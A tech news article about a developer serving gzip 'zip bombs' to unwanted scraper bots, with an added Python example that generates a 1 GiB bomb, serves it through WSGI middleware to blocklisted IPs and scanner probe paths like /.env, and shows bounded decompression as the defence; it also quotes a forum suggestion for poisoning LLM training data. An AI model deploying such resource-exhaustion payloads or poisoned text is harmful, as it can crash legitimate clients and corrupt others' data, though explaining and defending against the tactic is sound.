
Cyber pros are increasingly resorting to cyber guerrilla warfare to protect their servers. One blogger received much attention for the “zip bomb” tactic to fight scrapers and other malicious bots.
The web is filled with a plethora of unsophisticated crawlers, many of them malicious or unwelcome. To fight the barrage, software developer Ibrahim Diallo shared a seemingly effective method.
The “zip bomb” is a booby trap for unwanted bots. When the server decides that a request comes from such a bot, it answers with a small (1-10MB) gzip-compressed body. That body decompresses into something far larger, and bots that cannot cope with multi-gigabyte responses crash on the spot. (Strictly speaking it is a gzip bomb delivered through HTTP content encoding rather than a .zip archive, but the idea is the same.)
That is the intended goal: to exhaust the bot’s memory so it becomes unresponsive.
“I return a 200 OK response, and serve them a gzip response. I vary from a 1MB to 10MB file, which they are happy to ingest. For the most part, when they do, I never hear from them again,” Diallo shared in a blog post.
It works because gzip-compressed responses are standard practice for saving bandwidth and speeding up page loads. Like browsers, most bots advertise gzip support in their requests and decompress responses automatically before reading the page content.
However, a simple scraper typically inflates the whole body into memory before parsing it, and that memory is finite.
“The file expands, and expands, and expands, until they run out of memory and their server crashes. The 1MB file decompresses into a 1GB. This is more than enough to break most bots. However, for those pesky scripts that won't stop, I serve them the 10MB file. This one decompresses into 10GB and instantly kills the script,” the developer said.
Diallo openly shared instructions for creating the zip bomb, along with simple middleware code that checks whether a request looks malicious or comes from a blacklisted IP address and serves the bomb if so. Everything fits in a few lines of code. The developer warns, however, that you can crash your own machine in the process, for instance by accidentally decompressing the file locally.
Legitimate bots, like Googlebot, are well-engineered, clearly identify themselves, and follow strict protocols.
There is still a risk that a legitimate user will be served a zip bomb. Modern browsers generally survive it, though: they decompress responses as a stream, and a tab whose memory balloons by a gigabyte or more is killed by the browser rather than taking the whole machine down.
Intentionally sending data designed to crash another system raises ethical considerations, and it is not a foolproof solution either. Zip bombs can be detected and circumvented: a crawler that decompresses as a stream and stops once the output exceeds a size cap, or that simply does not request gzip encoding, is unaffected. The payload is also bounded, since a single DEFLATE stream cannot expand by more than roughly 1032:1, which is exactly why 1MB yields about 1GB.
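The mechanism described above, as an added example rather than Diallo’s own code: the first function builds the gzip bomb by streaming zeros through the compressor (so generating it never allocates the decompressed payload), the middleware serves it with a 200 OK and Content-Encoding: gzip to requests it flags, and the last function is the bounded decompression a careful crawler uses to detect and survive such a response. The probe paths, the blocklist, and the minimal `app(environ) -> (status, headers, body)` signature are constructed for this example only.

```python
"""Added example (not Diallo's code): build a gzip bomb, serve it from a
WSGI middleware, and show the bounded decompression that defeats it.
The probe paths and blocklist below are constructed for the demo."""
import gzip
import io
import zlib

CHUNK = 1 << 20  # 1 MiB of zeros per write; the input is streamed, never held whole


def make_gzip_bomb(decompressed_size: int, level: int = 9) -> bytes:
    """Return a gzip body that inflates to `decompressed_size` zero bytes.

    DEFLATE tops out at roughly 1032:1 on uniform input, so 1 GiB of zeros
    costs about 1 MiB on the wire. Only the compressed output is kept in
    memory, so generating the bomb is safe; inflating it is not.
    """
    out = io.BytesIO()
    zeros = b"\0" * CHUNK
    with gzip.GzipFile(fileobj=out, mode="wb", compresslevel=level) as gz:
        remaining = decompressed_size
        while remaining > 0:
            n = min(CHUNK, remaining)
            gz.write(zeros[:n])
            remaining -= n
    return out.getvalue()


# Constructed selection rules for the demo: a blocklist of client IPs plus a
# few paths that only vulnerability scanners ask for. Real deployments would
# substitute their own heuristics.
PROBE_PATHS = {"/.env", "/wp-login.php", "/phpmyadmin/"}


def is_unwanted(path: str, client_ip: str, blocklist: set[str]) -> bool:
    return client_ip in blocklist or path in PROBE_PATHS


def respond(environ: dict, bomb: bytes, blocklist: set[str], app):
    """Pure decision step: (status, headers, body_chunks) for one request.

    Flagged clients get 200 OK with Content-Encoding: gzip, so any client
    that honours the header inflates the bomb; everyone else reaches `app`,
    a simplified callable taking `environ` and returning the same triple.
    """
    path = environ.get("PATH_INFO", "")
    ip = environ.get("REMOTE_ADDR", "")
    if is_unwanted(path, ip, blocklist):
        headers = [
            ("Content-Type", "text/html; charset=utf-8"),
            ("Content-Encoding", "gzip"),
            ("Content-Length", str(len(bomb))),
        ]
        return "200 OK", headers, [bomb]
    return app(environ)


def zip_bomb_middleware(app, bomb: bytes, blocklist: set[str]):
    """Wrap the decision step as a standard WSGI callable."""
    def wsgi(environ, start_response):
        status, headers, body = respond(environ, bomb, blocklist, app)
        start_response(status, headers)
        return body
    return wsgi


def inflate_bounded(body: bytes, max_bytes: int, step: int = CHUNK):
    """Inflate a gzip body, refusing once the output exceeds `max_bytes`.

    Returns (is_bomb, bytes_inflated). zlib is driven with max_length, so the
    caller never materialises more than `step` bytes at a time; this is the
    defence that makes a crawler immune to the trick.
    """
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16+ selects gzip framing
    seen, buf = 0, body
    while not d.eof:
        chunk = d.decompress(buf, step)
        buf = d.unconsumed_tail
        seen += len(chunk)
        if seen > max_bytes:
            return True, seen  # stop inflating; treat the response as hostile
        if not chunk and not buf:
            break  # truncated stream; nothing more can be produced
    return False, seen


if __name__ == "__main__":
    bomb = make_gzip_bomb(1 << 30)  # 1 GiB of zeros, the 1 MB case from the post
    print(f"compressed: {len(bomb)} bytes")
    print(inflate_bounded(bomb, 64 << 20))  # hostile: output would exceed 64 MiB
```

Note that the bomb never has to exist decompressed anywhere: the generator writes zeros straight into the compressor, and the bounded inflater stops as soon as the cap is crossed. Never open the resulting file with a tool that decompresses it in full.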
Others jump on the bandwagon
On Monday, the “zip bomb” method became the most upvoted discussion on Lobste.rs, a computing-focused community for discussing technical content.
Some cyber pros said they have implemented the method. Others even suggested improvements, such as making it harder for bots to detect it, triggering the “zip bomb” after a certain number of requests, or poisoning content for AI bots.
“You should be able to use a small Markov chain to generate 1 KiB of random text and then random back references on word boundaries that expands to a few GiBs of nonsense text but uses only a few hundred KiBs of bandwidth. For extra fun, this will poison LLM training things by feeding them nonsense text,” one community member suggested.
The “zip bomb” has a long history as a way to exploit file decompression. The most famous example is “42.zip”, an archive of only 42 kilobytes that expands to a staggering 4.5 petabytes through several levels of nested archives. In 2019, David Fifield published a “better zip bomb” that reaches a comparable ratio (about 4.5 petabytes from a 46 MB file) without any nesting, by overlapping file entries within a single layer so that one run of compressed data is counted many times over.